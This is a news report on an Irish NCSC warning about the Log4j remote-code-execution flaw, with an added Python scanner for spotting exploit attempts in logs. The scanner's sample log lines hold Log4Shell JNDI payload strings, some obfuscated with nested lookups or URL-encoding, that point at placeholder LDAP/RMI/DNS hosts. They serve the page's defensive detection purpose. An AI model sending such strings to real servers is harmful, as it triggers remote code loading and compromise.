The National Cyber Security Centre (NCSC) is warning organisations about a newly disclosed vulnerability in a widely used Java logging library, which it says poses a “serious risk to the security and integrity of data.”
The vulnerability has been identified in Apache Log4j (CVE-2021-44228), an open source Java logging library used by many web applications and services.
It allows an unauthenticated remote attacker to execute arbitrary code with the privileges of the affected web server or application process.
The flaw is triggered when the application logs an attacker-supplied string containing a JNDI lookup, so any input that ends up in a log, such as an HTTP header or form field, can be used to deliver it.
The NCSC said it is likely that malicious actors will begin using this vulnerability to attack web servers shortly.
According to the NCSC, the issue affects organisations operating web server infrastructure rather than people browsing the web at home on laptops or personal devices.
Apache has released a fix, and administrators should follow their patch process to update to Log4j 2.15.0 (published as log4j-2.15.0-rc2).
All organisations should urgently assess their web servers for exposure to this risk, including services administered and provided by third parties, the NCSC said.
The centre added that there is no evidence that the vulnerability has been successfully exploited in the State so far, and that it has no indication of services or data being affected.
However, it said the risk of eventual compromise will persist until systems are updated.
Attempts to exploit the vulnerability can be detected.
Log files for any services using affected Log4j versions will contain the attacker-supplied lookup string; for example, “jndi:ldap” inside a “${...}” lookup.
Attackers commonly obfuscate that string with nested lookups and URL-encoding, so a plain search for “jndi:ldap” will miss some attempts.
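As an added illustration of the detection approach described above (this is example code written for this page, not code from the NCSC advisory or the Log4j project), the scanner below normalises the common obfuscations of the Log4j lookup syntax before searching for the JNDI pattern. The log lines are constructed for the example, the 203.0.113.0/24 addresses are documentation-range placeholders, and the set of obfuscation wrappers handled is assumed to be the common ones rather than an exhaustive list.

```python
import re
from urllib.parse import unquote

# Wrappers attackers use to hide the literal "jndi" token inside Log4j's
# ${...} lookup syntax.  Assumed to cover the common cases, not every bypass.
_CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")   # ${::-j}, ${env:NaN:-j}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//([^/}\s]*)", re.IGNORECASE)
_BARE_JNDI = re.compile(r"jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|corba|nds|https?)", re.IGNORECASE)


def normalise(text):
    """URL-decode twice, then resolve nested lookups until the text stops changing."""
    text = unquote(unquote(text))
    for _ in range(20):  # bound the loop; real payloads nest only a few levels deep
        new = _CASE_WRAPPER.sub(lambda m: m.group(1), text)
        new = _DEFAULT_VALUE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def scan_log_lines(lines):
    """Return one finding per line carrying a JNDI lookup string.

    "high" confidence: a full ${jndi:<scheme>://<target>} lookup after normalisation.
    "low" confidence: the token "jndi:<scheme>" without the lookup wrapper (noisy,
    but worth a look because the wrapper may have been truncated by the logger).
    """
    findings = []
    for lineno, raw in enumerate(lines, start=1):
        text = normalise(raw)
        full = _JNDI.search(text)
        if full:
            findings.append({"line": lineno, "confidence": "high",
                             "scheme": full.group(1).lower(),
                             "target": full.group(2), "raw": raw})
            continue
        bare = _BARE_JNDI.search(text)
        if bare:
            findings.append({"line": lineno, "confidence": "low",
                             "scheme": bare.group(1).lower(),
                             "target": None, "raw": raw})
    return findings


# Constructed sample access-log lines (not from any real incident).
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:14 +0000] "GET /?x=${${lower:j}ndi:${lower:r}mi://203.0.113.7:1099/o} HTTP/1.1" 400 0',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.7/x}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:16 +0000] "GET / HTTP/1.1" 200 612 "-" "${${env:NaN:-j}ndi:dns://203.0.113.7/x}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:17 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.7%2Fz%7D HTTP/1.1" 200 612',
    '10.0.0.5 - - [10/Dec/2021:14:02:18 +0000] "POST /comment HTTP/1.1" 200 12 "-" "saw jndi:ldap in a blog post"',
]

if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOGS):
        print(f"line {f['line']}: {f['confidence']} confidence, "
              f"scheme={f['scheme']} target={f['target']}")
```

Run it against real access logs (or application logs, since the string can arrive in any logged field, not only the User-Agent) by feeding the file's lines to scan_log_lines. A hit proves only that an attempt was logged; whether the lookup was actually resolved depends on the Log4j version in use, so matched hosts should be investigated rather than treated as confirmed compromises.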
The NCSC has published a detailed advisory at ncsc.gov.ie.
Further details will be published on the NCSC website as they emerge over the coming days.
Anyone who has been a victim of cyber crime should report the issue to An Garda Síochána.
This threat comes just days after a critical report of the HSE’s cyber security was published.
The PwC report, released on Friday, said the health service’s IT system was “frail” and “dispersed”.
There was a “known low level of cybersecurity maturity” within the HSE and the connected national health network, and this weakness had “persisted”, the report said.
A multiyear programme of investment in IT and cybersecurity was recommended.